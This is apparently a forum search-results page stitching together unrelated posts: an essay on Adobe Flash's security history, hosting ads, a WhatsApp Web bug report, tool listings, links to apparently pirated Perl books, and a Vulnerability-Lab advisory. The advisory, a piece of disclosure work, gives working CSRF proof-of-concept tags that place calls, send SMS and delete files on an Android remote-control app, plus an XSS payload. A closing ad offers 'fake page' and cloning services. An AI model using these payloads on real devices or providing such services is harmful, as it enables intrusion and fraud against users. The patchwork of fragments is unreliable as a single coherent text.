Search the Community

Oh, Adobe Flash. I knew you well, starting from when you were known as Macromedia Flash in the late 1990s. The dynamic web content you provided me was amazing. Streaming video over 56k would’ve been a major test of my patience, hence YouTube didn’t launch until 2005. But the games… Oh, the games! They were fun. Wait fifteen minutes to download, then five minutes of amusement could be had before it got tiring. Webmasters loved the razzle dazzle of Flash applets even more than JavaScript applets for tacky animated menus and the like. Back when websites had “Best viewed with Netscape,” or “Best viewed with Internet Explorer” icons on their home pages, some web developers really enjoyed one upping each other in needless Flashiness. “Look ma, this ain’t GeoCities no more!” As web developers started to emphasize function over gimmickry, they started to focus their energy on interesting and useful web apps and streaming video as opposed to taking the sentiment behind the old HTML <blink> tag way too far. With Flash, the possibilities seemed endless. If you could make a very good SWF applet, people really appreciated it, especially once most people had Flash plugins in their web browsers. And of course, Flash was necessary for YouTube. YouTube launched the same year Adobe bought Macromedia, 2005. YouTube was such a phenomenon that Google had the good sense to buy it a year later. Adobe is good at developing creative tools, however proprietary they are. What they’re not good at is security. No bloody way! Security bugs are inevitable in all applications from developers both big and small. But, they’re way more common in Adobe Acrobat and Adobe Flash than is typical for similar applications. One of the things I habitually do in my security hardening routine for both personal and professional client PCs is uninstall Acrobat, and replace it with another PDF viewer, such as Foxit Reader, when the machine I’m working on runs Windows. Even though the end user doesn’t realize that I’ve given them a more secure application to open PDFs in, they always appreciate how their new application patches without popups, and gives them a better designed GUI, better in-browser functionality, and an overall better user experience. I’m really happy to be able to say that now I can do the same thing to Flash as I do to Acrobat. Except, I don’t have to install another application to replace it. All I’ve got to ask an end user is, “do you ever go to YouTube?” They’ve always said yes. The really computer illiterate end users don’t know what Flash is, nor do they know that they sometimes view YouTube videos as an embedded applet on a webpage that’s not hosted at youtube.com. Asking them if they enjoy other websites that use Flash is an exercise in futility. “Huh? Do I use Google or Foxfire?” (Why oh why do they call Firefox “Foxfire?” Explaining to them the difference between the Google search engine and the Google Chrome web browser has made me ruin my manicures here and there.) But I could usually assume that they needed Flash for YouTube most of the time. A few years ago, they really needed it for games in Facebook, as well. The first nail in the coffin was mobile. The late Steve Jobs, although I strongly dislike the guy, was correct when he said, “Flash has not performed well on mobile devices. We have routinely asked Adobe to show us Flash performing well on a mobile device, any mobile device, for a few years now. We have never seen it.” Although Adobe really wanted to port Flash to mobile platforms, that effort was never successful. It was never available for iOS. It was available at times for Symbian, Palm OS, and webOS. It was available for some devices running Android versions 2.2 through 4.0.4. It never really seemed to catch on, once smartphones and tablets became the primary way for consumers to enjoy content from the Internet. W3C started working on HTML 5 in 2004. It was usable for me to play around in starting in 2010. But I’m more of a web page developer than a web app developer, so my web development was focused on standards compliance and cross browser and device compatibility rather than creating nifty things with the canvas element. Nonetheless, the introduction of the <video> tag made it a lot easier to embed video without Flash than ever before. And other new tags and functions in HTML 5, combined with sophisticated CSS and JavaScript use, rendered Flash unnecessary for dynamic apps, as well. HTML 5, when used by a competent developer, works just as well on mobile as it does on desktop platforms, and that was apparent well before HTML 5 became officially stable on October 28th, 2014. In fact, I can’t think of a more successful and widespread beta release off the top of my head. Unless you directly worked in web browser and engine development, October 28th would’ve been just another Tuesday. Adobe announced that they had given up on developing Flash for mobile in November 2011. That well predated HTML 5’s stable release. In addition to games and other web apps using open standard alternatives to Flash, YouTube started to make HTML 5 compatible videos available in January 2010, via WebM and H.264. Also, there are native mobile apps for watching YouTube videos outside of the web. So, the thorough acceptance of cross platform open standards, especially HTML 5, combined with everyone and their grandma using mobile devices and Adobe’s struggle with it, sealed Flash’s doom. Then, on January 27th of this year, YouTube announced that HTML 5 video is now default in Chrome, Internet Explorer 11, Safari 8, and the latest Firefox releases. If your browser uses one of the same rendering engines, such as the latest stable versions of WebKit and Trident, you’ll probably experience the same. A Brief Summary of Adobe’s Security Problems This is by far not a complete summary of all of the security problems Flash (and Acrobat) has had, but I’ll explain some of the major ones. In 2007, an Adobe (Acrobat) Reader bug exposed the local filesystems of users’ computers to anyone who knew how to exploit it. Trojan Adobe Flash Player and Reader updates started to become prevalent in 2008. It’s been such a problem that when I see an update popup on a user’s machine, I assume it’s malicious until I determine otherwise. So, that’s been a huge problem for consecutive years now. How come all kinds of other applications, open and closed, from developers of all sizes can patch without popups users have to interact with, but Adobe can’t manage to do that? That’s a massive trojan vector, and there are two disastrous sides to that coin. The vast majority of end users lack my expertise, particularly in malware. A Flash or Reader update popup could be a trojan. Sometimes end users have had experience with Adobe trojans already, so someone like me may have advised them to exercise caution when they see such a popup. But the popup could necessitate interaction for a legitimate and very necessary security patch. So with end users unable to determine whether or not a popup is a trojan, not interacting with it could be the less secure rather than more secure thing to do. In 2009, Symantec’s Internet Security Threat Report explained how Adobe, with Flash and Reader, had one of their most insecure years ever. Adobe’s Chuck Geschke was tremendously arrogant when he was interviewed by John Paczkowski about that. Paczkowski: “Both Apple and Microsoft have said publicly now that Flash has issues with reliability, security, and performance. Do you think those complaints are legitimate?” Geschke: “I think they’re old news. Go to our website and read the actual facts about Flash. We enumerate the facts about Flash there as we see them. They may have a different set of facts that they believe are accurate. It’s up to you to decide.” Ummm, Mr. Geschke… Facts are never subjective by their very definition. Facts are facts, period. You sound like a bloody Scientologist. “Today, I feel like 2 + 2 = 5. It just feels right to me, but your mathematics professor may have a different set of facts they believe are accurate.” Here are the facts. This is what Symantec’s 2009 report actually said, and I hold them in much higher esteem than I do Adobe: “In 2009, Symantec documented 321 vulnerabilities affecting plugins for web browsers. ActiveX technologies were affected by 134 vulnerabilities, which was the highest among the plugin technologies examined. Of the remaining technologies, Java SE had 84 vulnerabilities, Adobe Reader had 49 vulnerabilities, QuickTime had 27 vulnerabilities, and Adobe Flash Player was subject to 23 vulnerabilities. The remaining four vulnerabilities affected extensions for Firefox… “Among the vulnerabilities discovered in 2009, a vulnerability affecting both Adobe Reader and Flash Player was the second most attacked vulnerability. This was also one of four zero-day vulnerabilities affecting Adobe plug-ins during 2009. Two of the vulnerabilities were in the top five attacked vulnerabilities for 2009. Additionally, Adobe vulnerabilities have been associated with malicious code attacks such as the Pidief.E Trojan.” Ouch! And Adobe’s position as one of the most insecure major software vendors ever didn’t cease in 2009. It still isn’t “old news,” Mr. Geschke. Malicious PDFs were used to sucessfully attack Rackspace, Adobe, and Google in 2010. A remote access bug was discovered in Flash in 2011. When properly exploited, one could acquire full control of an affected client machine. Flash Player made it to the top of Symantec’s list of most exploitable plugins in 2012. In October 2013, Adobe was attacked, revealing the sensitive data of 2.9 million users. The sensitive data affected included credit card and debit card information. The same day, YouTube announced default HTML 5 video, January 27th, 2015, Adobe had to release a security patch for two really major Flash vulnerabilities. Independent security researcher Kafiene discovered vulnerability CVE-2015-0311. It allowed Flash to be used as a vector for malicious code injection which could, once again, give complete control of an affected machine to a blackhat. A security researcher named Bilou discovered CVE-2015-0312. It was very similar to CVE-2015-0311, it also enables remote code injection. And of course, with Adobe being Adobe, barely a week passed before fifteen vulnerabilities had to be addressed in a patch that released on February 5th. Yet again, these vulnerabilities enable remote malicious code injection and execution. If you’re still using Flash in Windows, OS X, and GNU/Linux, this is what you must know about eighteen additional CVE listings: “Users of Adobe Flash Player for Windows and OS X should update to Adobe Flash Player 16.0.0.305. Users of Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269. Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442. The Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305.” I can safely assume that we’ll continue to learn about really major vulnerabilities that pertain to Flash and Reader for as long as those products continue to be developed by Adobe. I base that assumption not only on Adobe’s reputation and their tendency to take a head in the sand approach to security, but also on Adobe’s patch management style. Their patches address vulnerabilities that are near the surface of their applications, rather than the really deep vulnerabilities at the center of their really old code bases. Way too much of the code is unchanged from the 1990s. I’d love for a security firm with much greater resources than I have to do a really thorough penetration test of the most recent versions of Flash and Reader for Windows, OS X, and GNU/Linux. The reported findings would probably require a forest’s worth of pulp if printed on paper. So, yes, security vulnerabilities can be found in products from all developers. But Adobe is much worse than the norm. Alternative PDF viewers and creators are available for pretty much all mobile and desktop platforms. And open web standards such as HTML 5 have made Flash obsolete. Heck, I even use GIMP instead of Photoshop. Here’s my advice. Whether you’re enterprise or a consumer, get Adobe out of your abode. Now you can do it for content creation and consumption. And it’s easy. References Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched- Shaun Nichols, The Register Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched • The Register YouTube flushes Flash for future flicks- Simon Sharwood, The Register YouTube flushes Flash for future flicks • The Register YouTube now defaults to HTML 5 <video>- Richard Leider, YouTube Engineering and Developers Blog YouTube Engineering and Developers Blog: YouTube now defaults to HTML5 <video> Another day, yet another Adobe Flash patch. Because that’s how we live now- Iain Thomson, The Register Another day, yet another emergency Adobe Flash patch. Because that's how we live now • The Register Adobe has an epically abysmal security record- Jose Pagliery, CNN Money Adobe has an epically abysmal security record - Oct. 8, 2013 Adobe says hackers accessed data for 2.9 million customers- James O’Toole, CNN Money http://money.cnn.com/2013/10/03/technology/security/adobe-hack/index.html?iid=EL Thoughts on Flash- Steve Jobs, Apple.com https://www.apple.com/hotnews/thoughts-on-flash/ Why You Should Ditch Adobe Shockwave- Brian Krebs, Krebs on Security http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/ YouTube says HTML5 video ready for primetime, makes it default- Ron Amadeo, ArsTechnica http://arstechnica.com/gadgets/2015/01/youtube-declares-html5-video-ready-for-primetime-makes-it-default/ The tooth gnashing you hear is from Flash users installing a new 0day patch- Dan Goodin, ArsTechnica http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/ How secure is Flash? Here’s what Adobe won’t tell you- Ed Bott, ZDNet http://www.zdnet.com/article/how-secure-is-flash-heres-what-adobe-wont-tell-you/ Adobe issues emergency Flash update for Windows and Mac- Dara Kerr, C|Net http://www.cnet.com/news/adobe-issues-emergency-flash-update-for-windows-and-mac/ Source

Salut, din cate observ se pare ca doriti o gazduire web de calitate cu securitatea foarte buna. Eu cu un amic am reusit sa deschidem o firma de webhosting pe nume clear-host.com , noi oferim gazduire de calitate cu o securitate foarte buna. Ce oferim noi: Gazduire Web Primu pachet: FREE! spatiu: 500 MB totu nelimitat CronJob: Da Anti Flood / DDos Anti Shell / Hacking suport: 24/7 Al doilea pachet: La 1.50 Dolari Totu nelimitat tot cu acelasi specificatii de securitate Reseller Web La 5.00 Dolari Totu nelimitat cu acelasi specificatii de securitate Acceptam orice tip de site ! Acceptam orice tip de plata (paypal sau cod reincarcare) EDIT: De acum platile nu o sa mai fie in Euro deoarece au fost probleme cu paypal si o sa fie in Dolari. link: Clear Host Romania - Shopping Cart Daca exista vreo problema va rog sa scrieti aici !

http://express.ikoula.com/en/premium_hosting

Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version. An independent 17-year-old security researcher Indrajeet Bhuyan reported two security holes in the WhatsApp web client that in some way exposes its users’ privacy. Bhuyan called the first hole, WhatsApp photo privacy bug and the other WhatsApp Web Photo Sync Bug. Bhuyan is the same security researcher who reported us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations. Whatsapp Photo Privacy Bug According to him, the new version of WhatsApp Web allows us to view a user’s profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to "Contacts Only," the profile picture can be viewed by out of contacts people as well. Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But, this is not in the case of WhatsApp Web. You can watch how this works in the video demonstration below: WhatsApp Web Photo Sync Bug The second security hole points out the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of WhatsApp application, the photo appears blurred and can’t be viewed. However, the same photo, which has already been deleted by the user from mobile WhatsApp version, can be accessible by Whatsapp Web as the photo does not get deleted from its web client, revealing the fact that mobile and web clients of the service are not synced properly. You can also watch the video demonstration on this as well: This is no surprise, as WhatsApp Web introduced just a couple of days before and these small security and implementation flaws could be expected at this time, as well as some other bugs could also be revealed in the near future. However, the company will surely fix the issues and will definitely make its users’ messaging experience secure. As partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on Android platform, stepping a way forward for the online privacy of its users around the world. -> Source: 17-Year-Old Found Bugs in WhatsApp Web and Mobile App - Hacker News

Colec?ia mea de pdf-uri, majoritatea de actualitate; actualizat? regulat; enjoy! https://mega.co.nz/#F!VEYhhTQQ!0hp5FtWcHDCtRT5OjjWRUg

XSS or Cross Site Scripting is a web application vulnerability that occurs when untrusted data from the user is processed by the web application without validation and is reflected back to the browser without encoding or escaping, resulting in code execution at the browser engine. type of XSS Reflected or Non-Persistent XSS ? Stored or Persistent XSS ? DOM based XSS ? mXSS or Mutation XSS Read more: http://dl.packetstormsecurity.net/papers/general/ultimate-xss.pdf

Document Title: =============== Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1409 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1409 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== Remote Web Desktop enable you remotely manage & control your Android device from the computer web browser over wireless connection. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=net.xdevelop.rmp ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Web Desktop Full v5.9.5 Android application. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== SmartDog Studio HK Product: Remote Web Desktop Full 5.9.5 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery and cross site scripting vulnerabilities has been discovered in the Remote Web Desktop Full 5.9.5 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and cross site scripting attacks. 1.1 The cross site scripting vulnerabilities are located in `to` value of the `sendSMS.json` file in the send sms function. The attackers needs to `Create new a contact` or `Create a contact group` with a malicious payload as name to inject. The execution occurs after the refresh inside of the main message module. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] to 1.2 The cross site request forgery vulnerabilities are located in the `makeCall.json`,`sendSMS.json`,`addTextFile.json`, `deleteFile.json` files. Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add, call, send). Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] makeCall.json [+] sendSMS.json [+] addTextFile.json [+] deleteFile.json Proof of Concept (PoC): ======================= 1.1 The cross site request forgery vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Call Phone Number <img src="http://localhost:8999/makeCall.json?phoneNo=11111111111" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /makeCall.json?phoneNo=11111111111 HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 true Send SMS: --- PoC Session Logs [GET] (Execution) --- <img src="http://localhost:8999/sendSMS.json?to=333&content=Hello""width="0" height="0" border="0"> GET /sendSMS.json?to=333&content=Hello HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 SMS to 333 sent successfully Create File: --- PoC Session Logs [GET] (Execution) --- <img src="http://localhost:8999/addTextFile.json?id=/folder&name=file" width="0" height="0" border="0"> GET /addTextFile.json?id=/folder/&name=file HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 26 /folder/file Delete File: <img src="http://localhost:8999/deleteFile.json?id=/file" width="0" height="0" border="0"> GET /deleteFile.json?id=%2Fmnt%2Femmc%2Faissak%7C HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 true Reference: http://localhost:8999/ 1.2 The application-side input validation web vulnerabilities can be exploited by local low privileged application account or remote attackers with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Application-Side Cross Site Scripting --- PoC Session Logs [GET] (Execution) --- GET /sendSMS.json?to=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&content=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&uid=1421297818963 HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: text/plain; charset=utf-8 Referer: http://192.168.1.3:8999/ Cookie: RemoteMobileSession=-6603034196170561541 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 68 SMS to <img src=x onerror=alert(/XSS/)> sent failed: Unknown Error --- PoC Session Logs [GET] (Execution) --- Create new a contact or a contact group with the payload as name "<img src=x onerror=alert(/XSS/)>" and click the contact button to save Reference: http://localhost:8999/ Security Risk: ============== 1.1 The security risk of the cross site request forgery web vulnerabilities are estimated as medium. (CVSS 2.2) 1.2 The security risk of the application-side input validation web vulnerability is estimated as medium. (CVSS 2.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting ? Packet Storm

ebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Download: Sunrise Technologies

ModSecurity™is an open source, free web application firewall (WAF) Apache module. With over 70% of all attacks now carried out over the web application level, organizations need all the help they can get in making their systems secure. Download: ModSecurity: Download Code

The OWASP WebSpa Project is a Java web knocking tool for sending a single HTTP/S request to your web server in order to authorize the execution of a premeditated Operating System (O/S) command. It provides a cryptographically protected "open sesame" mechanism on the web application layer, comparable to well-known port-knocking techniques Download: https://www.owasp.org/index.php/OWASP_WebSpa_Project

Dupa ce m-am plictisit de carti si codeaca , prin sectiunea developers de la google am gasit asta : Udacity Poti sa inveti: Matematica, Fizica, Psihologie, "Business"(Economie/Antrep), si programare ( web + desktop ). Have fun.

Vreau sa montez o camera ( dar nu stiu ce camera) si sa contectez la mine la site gen: http://buzaucity.ro/index.php?option=com_wrapper&view=wrapper&Itemid=115

CutyCapt CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer. Samples Here are some samples of CutyCapt generated renderings: PNG Snapshot of http://digg.com PNG Snapshot of css Zen Garden: The Beauty in CSS Design SVG Snapshot of MSDN Silverlight Dev Center PDF Snapshot of MSDN Silverlight Dev Center Status CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use of with caution. Requirements CutyCapt depends on Qt 4.4.0+. Download Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require to re-distribute a DLL instead, and Qt no longer supports static builds of QtWebkit. Similarily, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks. CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems) CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems) Source code The source code is available in the SVN repositorty(download tarball). Usage Open a command prompt and ask for help: % CutyCapt --help ----------------------------------------------------------------------------- Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png ----------------------------------------------------------------------------- --help Print this help page and exit --url=<url> The URL to capture (http:...|file:...|...) --out=<path> The target file (.png|pdf|ps|svg|jpeg|...) --out-format=<f> Like extension in --out, overrides heuristic --min-width=<int> Minimal width for the image (default: 800) --min-height=<int> Minimal height for the image (default: 600) --max-wait=<ms> Don't wait more than (default: 90000, inf: 0) --delay=<ms> After successful load, wait (default: 0) --user-styles=<url> Location of user style sheet, if any --header=<name>:<value> request header; repeatable; some can't be set --method=<get|post|put> Specifies the request method (default: get) --body-string=<string> Unencoded request body (default: none) --body-base64=<base64> Base64-encoded request body (default: none) --app-name=<name> appName used in User-Agent; default is none --app-version=<version> appVers used in User-Agent; default is none --user-agent=<string> Override the User-Agent header Qt would set --javascript=<on|off> JavaScript execution (default: on) --java=<on|off> Java execution (default: unknown) --plugins=<on|off> Plugin execution (default: unknown) --private-browsing=<on|off> Private browsing (default: unknown) --auto-load-images=<on|off> Automatic image loading (default: on) --js-can-open-windows=<on|off> Script can open windows? (default: unknown) --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown) --print-backgrounds=<on|off> Backgrounds in PDF/PS output (default: off) ----------------------------------------------------------------------------- <f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm ----------------------------------------------------------------------------- Build Instructions If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do: % sudo apt-get install subversion libqt4-webkit libqt4-dev g++ % svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt % cd cutycapt/CutyCapt % qmake % make % ./CutyCapt --url=http://www.example.org --out=example.png Using CutyCapt without X server You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as light-weight server if you are not running an interactive graphical desktop environment. For example, you could use: % xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=... Author Björn Höhrmann bjoern@hoehrmann.de CutyCapt - A Qt WebKit Web Page Rendering Capture Utility

Este un plugin pentru powerpoint, folositor pentru a crea con?inut e-learning în format SCORM, web, flash, in special pentru platforme e-learning gen moodle, pagini web simple în HTML5, grafice, toate acestea cu optiunea de a fi optimizate pentru dispozitive mobile. Men?ine efectele, anima?iile, cam tot formatul prezent?rii, se poate exporta în diferite formate, only content pentru grafice sau orientare web, avem si optiunea cu player pentru con?inut e-learning. Ofera licente free pentru Beta Testeri. _________________________________________________ Create interactive eLearning courses with narrations in Flash and HTML5 and view them on computers, Android devices and iPads. See what’s new ? Publish to Flash and HTML5 Create interactive courses and presentations for all computers, Android tablets and iPads with a single mouse-click. iSpring Pro 7 allows you to convert your PowerPoint content into Flash, HTML5 or Flash+HTML5 in a combined mode. Now you can develop eLearning package that will be supported on all devices Sursa: IspringSolutions

http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net

Oferta de inscriere in directoare web : Ofer inscriere in 600 de directoare web, straine cu pretul de 10 euro paypall, primi 3 care o sa raspunda la acest post, ca primi o oferta de 3 euro pt 600 de directoare web,, pentru confirmarea realitatii. Inscrierea va fi in 600 de directoare web, automata si semi automata, pe directoare web cu pr 2,3,4 si unele de 5. Ce-i interesati PM, sau scrieti pe acest topic. Daca am gresit unde am pus acest topic ( ca nu am stiut unde sa-l pun ) rog admini sa ma scuze si sa il mute unde ii e locu.

Advanced Perl Programming, 2nd Edition [2005] Extending and Embedding Perl [2003] Extreme Perl [2004] Higher-Order Perl: Transforming Programs with Programs [2005] Mastering Algorithms with Perl [1999] Mastering Perl [2007] Perl Debugged [2001] Perl Testing: A Developer's Notebook [2005] Practical mod_perl [2003] Pro Perl Debugging: From Professional to Expert [2005] Writing Perl Modules for CPAN [2002] Perl Medic: Transforming Legacy Code [2004] Perl Best Practices [2005] Effective Perl Programming: Ways to Write Better, More Idiomatic Perl (2nd Edition) [2010] request download ticket | Perl1.7z - ifile.it --- Beginning Perl [2000] Games Diversions & Perl Culture: Best of the Perl Journal [2004] Impatient Perl [2010] Intermediate Perl [2006] Learning Perl, Sixth Edition [2011] Learning Perl Objects, References & Modules [2003] Learning Perl on Win32 [1997] Learning Perl the Hard Way [2003] Modern Perl [2010] Object Oriented Perl [2000] Perl 5 Pocket Reference, 3rd Edition: Programming Tools [2000] Perl 6 and Parrot Essentials, 2nd Edition [2004] Perl Cookbook, 2nd Edition [2003] Perl Developer's Dictionary [2002] Perl for Beginners [2010] Perl Hacks [2006] Perl in a Nutshell, 2nd Edition [2002] Perl Power! - The Comprehensive Guide [2006] Perl Programmers Reference Guide [1998] Perl - The Complete Reference, 2nd Edition [2001] Professional Perl Programming [2001] Teach Yourself Perl in 24 Hours, 3rd Edition [2005] The Perl CD Bookshelf 4.0 Wicked Cool Perl Scripts [2006] Automating Windows with Perl [1999] Minimal Perl For UNIX and Linux People [2007] Automating System Administration with Perl, 2nd Edition [2009] request download ticket | Perl2.7z - ifile.it --- Learning Perl/Tk [1999] Mastering Perl/Tk [2002] Graphics Programming with Perl [2002] Beginning Web Development with Perl: From Novice to Professional [2006] Catalyst 5.8 - The Perl MVC Framework [2009] Catalyst - Accelerating Perl Web Application Development [2007] MySQL and Perl for the Web [2001] Network Programming with Perl [2000] Perl & LWP [2002] Perl Database Programming [2003] Perl for Oracle DBAs [2002] Practical mod_perl [2003] Programming the Network With Perl [2002] Programming the Perl DBI [2000] Programming Web Services with Perl [2002] Spidering Hacks [2003] The Definitive Guide to Catalyst: Writing Extensible, Scalable, and Maintainable Perl-Based Web Applications [2009] Writing Apache Modules with Perl and C [1999] Data Munging with Perl [2001] Perl and XML [2002] Perl Template Toolkit [2003] Pro Perl Parsing [2005] Practical Text Mining With Perl [2008] Programming for Linguists: Perl for Language Researchers [2003] An Introduction to Language Processing with Perl and Prolog [2010] request download ticket | Perl3.7z - ifile.it

Ofer: - Servicii de dezvoltare web in urmatoarele medii: PHP, HTML, CSS, Javascript si MySQL. - Bot scripting (crawlere, automatizari operatiuni, interactiuni cu diferite sisteme) Va pot garanta calitate si profesionalism, la preturi accesibile. Daca sunteti interesat, lasati un PM cu datele de contact.

Realizam aplicatii web, php, css3, html5, wordpress, joomla, magento , iphone, clone aplicatii , website-uri, fake page, scripturi, programe, clonari web, clone casinouri, ./aplicatii linux/cisco ..etc Seriozitate.PM mesaj pe forum rstcenter pentru detalii

